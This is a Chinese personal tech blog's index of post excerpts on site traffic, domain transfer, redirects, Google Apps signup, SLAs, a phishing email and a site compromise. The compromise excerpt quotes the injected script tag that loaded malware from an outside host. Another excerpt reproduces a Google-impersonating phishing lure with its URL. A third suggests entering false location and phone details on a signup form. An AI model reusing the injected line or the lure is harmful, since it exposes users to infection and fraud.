日志统计分析:年底流量小结 刚好用上WebLeon那里学到的FireFox截屏插件
2005年chedong.com主要使用了以下几套系统:
首页生成: Lilina/MagpieRSS
Blog发布: MT del.icio.us Flickr
流量分析: AWStats, Google Analytics
点击统计: mybloglog.com
referer统计: Booso的referer引擎
感觉:
CMS的各个环节都在向向在线的服务发展;
然后通过RSS/JS将各种服务粘合起来;
按此阅读全文 "年终总结:2005 chedong.com 年终小结" »
又到了年终小结的时候了:
chedong.com:
网站大部分流量来源仍然是Google/Baidu。
不过今年的热门主题是:spoolsv和脑筋急转弯,完全是歪打正着。
2006最常用的几个软件和服务基本上和2005年的差不多,更多的是改进和熟悉使用。
在工具栏上增加了2个常用的https服务:GMail和GReader。
GMail:
把 @chedong.com邮件先迁移到了DreamHost(先过滤一部分垃圾邮件),然后转发给GMail。
GReader:
GReader今年的改版回归了树型,速度上大大超越BlogLines。而抓虾很有潜力的是digg功能:RSS阅读和DIGG发掘机制的结合是未来超越单纯的RSS阅读和纯DIGG服务的方向。
按此阅读全文 "年终总结:2006 chedong.com 年终小结" »
Auth Code: 域名迁移最重要的就是Auth Code,基本上说,域名的Auth Code是你的域名在各家域名hosting服务商之间迁移的令牌,每个域名对应一个密文的令牌(DreamHost的是一个15位的数字,有的是一个12位的字符串),在多个国外的域名服务商之间切换直接提交Auth Code即可。在DreamHost的控制面板中: 列出了你所有拥有并在Dreamhost解析的域名所对应的Auth Code。
国内的服务商在后台界面中不显示域名对应的Auth Code,有一个申请的流程。首先向你在国内的服务商提出申请,一般是要求传真身份证和申请表。如果传真不方便,把身份证拍照下来+申请表文档附件邮件给服务商也可以。如果顺利: 服务商会给你发送邮件,将迁移用的Auth Code给你
然后在国外服务商的迁移导入界面中填写Auth Code即可,一般提交后2周左右迁移完成。在此期间也要注意一下你的域名注册时候的联系人邮箱,可能接收方还会再发个接收确认信之类的。
我将服务迁移到国外:只想用DNS和邮件转发,而不用国外域名服务商的其他服务:DreamHost是必须从DNS到主机都一起用,不能修改DNS,所以专门需要一个域名管理Only的服务商:慢客向我推荐了ENom,这个服务商对于管理几十个域名还比较有效,但是如果只管理几个域名就有些亏了: 要交99$保证金。迁移了2个花了十几$后剩下的钱就闲在那里了。
按此阅读全文 "将域名解析迁移到国外的服务商" »
阿里妈妈为期2个月的推介活动已经展开:可能在很多网站上都看到了这个广告。
其中的w=p_10000513就是你的帐号代码,会一直跟踪到用户注册成功并发布广告位。新的广告注册用户发布后: 可以参考一下注意事项,这样也许会更快的获得收入。
目前blog广告位的收入参考: 日独立IP 3000左右,报价50¥/ 周。
“此地、钱多、站少、速来”这个广告听着很耳熟啊,查了一下发现原型是:此地 钱多 人傻 速来,
而出处非常复制:据说是发自杭州市宝石山下一出租房的汇款单上的简短附言。
其他说法:
有人说出处是A:一个巴西业余球员;
有人说是B:足球的媒体记者;
有人说是C:一些早期坐台小姐;
也有人说是D:对当地土老讲的话;
按此阅读全文 "[AD] 此地、钱多、站少、速来的来历" »
各种不同的域名地址对于搜索引擎的除重(deduplication)来说是一个负担,有没有"/"和首页的文件连接,一个域名首页就可以有6个地址:
www.chedong.com/
chedong.com/
www.chedong.com
chedong.com
www.chedong.com/index.php
chedong.com/index.php
如果加上一些参数,比如用于来源跟踪等还会有更多无穷无尽的地址。
www.chedong.com/?source=foobar
所以搜索引擎鼓励发布者把URL标准化(归一化)。首先就是域名的归一化,原先我的设置为: www.chedong.com / chedong.com为别名。现在改为chedong.com 301转向到www.chedong.com
<VirtualHost *:80>
ServerName chedong.com
RewriteEngine on
RewriteRule ^(.*)$ http://www.chedong.com$1 [R=301,L]
</VirtualHost>
如果没有mod_rewrite也可以设置mod_alias:
RedirectMatch 301 ^(.*)$ http://www.chedong.com
按此阅读全文 "把不带前缀的域名转向到www.域名的Apache 301转向配置样例" »
2007年过去了,又到了年终总结的时候。
先看数字,一年下来访问人为148万(月独立IP累计),而人流量基本上从2006年12月份以后就没有增长了(每天平均在6000人左右),但带宽控制的不错: 经过http压缩和缓存优化和防盗链处理以后以后文件字节流量还下降了几十G(2007年共传输210G数据,其中有1/3左右为蜘蛛、机器人流量),另外一个下降的原因是对一些RSS订阅进行了转向。
访问来源仍然主要是搜索引擎:已经超过了50%(可以说,没有搜索引擎这个网站几乎就不存在)
来自搜索引擎 - 全部列出
- Baidu 677764 814104
- Google 543604 567471
- Yahoo! 66793 68826
- SoSo 50184 65639
- VNet 24568 24570
- Windows Live 15684 36093
- 3721 11038 11038
- MSN Search 6330 6344
- Google (Images) 4154 5967
- SoGou 3002 3965
2006年无意中解决了spoolsv.exe的问题,2007年则有目的的解决了svchost.exe的问题:
181002 个不同的关键字句 搜索 百分比
svchost.exe 94856 7 %
spoolsv.exe 91142 6.8 %
spoolsv 79418 5.9 %
svchost 49209 3.6 %
免费杀毒软件 35585 2.6 %
cvs 27687 2 %
杀毒软件 22625 1.6 %
免费杀毒软件 21707 1.6 %
lucene 17863 1.3 %
假设每个关键词搜索能为搜索者节省几个小时的话:这一年下来应该累计节省了几百个人月了,这是不是也算是捐献时间的一种呢?其实我一直在想:目前这个网站主要的用途就是为初学者提供了一些入门的帮助,也许更需要的是一个wiki模式的归档平台而不是一个blog。修改/优化以前文章的内容,标题已经成为了更加经常的工作。
按此阅读全文 "年终总结: 2007 chedong.com 小结" »
下午参加了UCDChina上海书友会的活动,也谈到了图片服务的防盗链问题。Hanson发过一篇牢骚: 门户网站的blog服务大部分都是禁止其他网站引用上传图片的,而最近国内专业的图片管理网站又拍也限制了图片的外链访问。从图片的hosting网站来说: 由于存储设备和存储机制的改进,图片存储一般不是太高的成本。主要的成本在于带宽:而很多盗链(寄生)网站经常利用免费服务存储一些色情图片,这些内容的流量非常大,如果不及时控制的话,非常容易形成破窗效应从而导致免费服务的成本失控。 同样是个人图片管理网站: FlickR是如何对图片流量进行成本控制的呢?
技术保障:
1 有基于用户帐号的月度流量控制。免费用户一个日历月的流量以前是有上限的20G(现在没了),上传文件的空间上限是20M(现在是100M);
2 FlickR的缺省供免费用户共享的图片大部分是较小幅面的缩略图:幅面一般在400像素以下,文件大小只有几k到几十k;收费用户才可以从外站引用原幅面的图;
3 用户帐户注册是要有邮箱校验的激活机制,防止自动/机器大量注册免费帐号;
用户协议上:
1 如果发现免费用户使用非原创内容,flickr是有理由删除内容并停用帐号的;
2 Flickr在对外共享图片的时候: 是要求加上链接指向原图(在FlickR上的)地址的,并且为图片插入很多Blog系统提供的API支持;
按此阅读全文 "FlickR如何控制外站的引用(图片盗链)" »
很多个人的创业公司都是使用免费的GoogleMail作为员工邮箱(现在已经可以直接免费申请,不用邀请了);稍微大一些的,则可以自己的公司邮件系统托管在了Google的企业应用套件平台上: 免费版就包括了支持数百帐号的6G邮箱(含邮件列表),在线日历,现在文档共享等功能,而且邮箱的帐号是可以绑定GTalk IM服务的。最常见的问题是如何申请: 从中文界面到了第二步填写信息的时候,总是会提示你选择的国家(中国)"Google 企业应用套件目前不支持该国家/地区的域名。"
这里有个问题: 最重要的是要通过美国的代理服务器访问;
1 申请的域名必须是.com域名的邮箱:如果有.cn com.cn域名需要申请,可以先申请一个.com域名的,然后设置另外的.cn .com.cn域名为相应的.com域名的别名即可;
2 申请的国家填写美国: 注册页面是有IP对应国家的校验的,所以要通过美国的代理服务器填写注册页面才能提交通过;
3 电话号码填写一个合法的美国电话号码:555 222-2222;
注册后:
1 会有域名拥有者校验:
在网站根域名的目录下,上传一个带有校验码的googlehostedservice.html文件;
2 域名MX记录修改等,基本上按照提示修改即可
ASPMX.L.GOOGLE.COM. 10
ALT1.ASPMX.L.GOOGLE.COM. 20
ALT2.ASPMX.L.GOOGLE.COM. 30
ASPMX2.GOOGLEMAIL.COM. 40
ASPMX3.GOOGLEMAIL.COM. 50
ASPMX4.GOOGLEMAIL.COM. 60
ASPMX5.GOOGLEMAIL.COM. 70
在博客大巴具体使用下来的优缺点附后……
按此阅读全文 "免费企业邮箱: Google app企业邮局的申请" »
在博客大巴最近的机房续约,机房搬迁和CDN的协议中,都遇到了下服务有效性条款的服务级别协议(Service Level Agreement, SLA)问题。在之前的很多服务合同中,国内的IDC大多是这样定义的: 服务中断1个小时,赔偿2倍时间的服务。这样计算:一个月下来如果网络陆陆续续中断了15天,才赔一个月的服务? 比较一下国外相应服务的条款:
Nirvanix的SLA条款
Amazon S3服务的SLA条款
服务有效时间百分比每自然月 下月服务补偿百分比
大于等于99%同时小于99.9% 10%
低于99% 25%
另外一个问题就是监控的依据:
无论是基于服务商还是基于客户自身,都有一定问题。国内也不知道哪里有比较低成本的监控服务,而监控的细节就更成问题了,还有基于南北电信/网通部署不同的监控点等问题。
更新:2008-08-29
经过1个月的整理,机房的监控主要需要2个方面,即时统计和详细截取;
1 即时监控:主要的目的是用于确定事故的起始点和报警,这方面我们参考了山寨科学家的叽歪监控, 配合Nagios的E-Mail alert发送到手机邮箱报警,时间可以精确到2分钟,这时候Nagios的Cacti统计也有助于从宏观发现事故的特点和原因;
2 细节截取:出现问题的时候,还需要一个详细的事故数据,需要分析当时各个地区的ping tracerout情况等,结合基调网络的多点统计报表,这类统计成本较高,对即时性要求可以低一些;
按此阅读全文 "[咨询] 如何签署网络服务有效性条款SLA 服务监控网站搜集" »
早上收到了一封貌似正常的邮件:
Hello,
Dear Gmail customer
After our free email services we offer you to sing up for our free hosting services.
This service currently is in beta test.
And we choose you to test this services and report us any bug you may find.We give you unlimited webspace on your own domain name you must only change your dns services to ns1.google.com and ns2.google.com and enter your domain name in our special control panel.
Our servers are linux based and we support PHP, SSL (Secure Shell),FTP,Stats,CGI,Perl,Unlimited email address and finaly 500 MySQL Database.
Notice :
Dont sell this invitation code in auction website that may cause we disable your account in the future.
Your invitation code :
http://gmail-application.com/cvw2p99ah7dtV1bFJyacSHUQcdROroysWeaIkkATEXaZUJ7n6wwXjzlyFVEYfJyB74Y66qln8VSP1Njjbp4zW/
Need help ? Hosting-Support@google.com
Google Webhosting Team
为什么是欺诈邮件,whois一下邀请链接的域名就知道了:详情附后,注册人好像在香港,搜索 Hosting-Support@google看,1月份,4月份,8月份都有类似邮件发出;
按此阅读全文 "关于Google FREE Webhosting !的欺诈邮件 200∞" »
4月1日中午,有朋友发来邮件: 访问 chedong.com 的页面时;
该网站可能含有恶意软件,有可能会危害您的电脑。
http://www.google.com.hk/interstitial?url=http://www.chedong.com/
到Google的诊断页看了一下:
我们过去 90 天内对此网站上的 2 张网页进行了测试,发现有 1
张网页在未经用户同意的情况下就会将恶意软件下载并安装到用户的机器中。Google 上次访问此网站的日期是
2010-03-31,上次在此网站中发现可疑内容的日期是 2010-03-30。
Malicious software includes 2 exploit(s). Successful infection
resulted in an average of 1 new process(es) on the target machine.
恶意软件托管在 3 个域上,其中包括 surrogaty.uz.ua/, abseconbluedevils.org/, powergym.be/。
2 个域以传播媒介的身份向此网站的访问者散发了恶意软件,其中包括 abseconbluedevils.org/, help2strike.org.ua/。
This site was hosted on 1 network(s) including AS26347 (DREAMHOST).
登录到服务器上:
grep -R powergym *
发现数十个目录缺省页 index.html index.php default.html 全部在3月30日被附加了这样一行script:
script language='JavaScript' src='http://powergym.be/xxxxss36dj.js'
回家后断断续续折腾了2天,终于将大部分目录回滚到了3月30日之前;近期还在和DreamHost联系,查看系统登录日志,查看各个目录下的应用安装情况;
按此阅读全文 "在Dreamhost遭遇挂马: powergym.be" »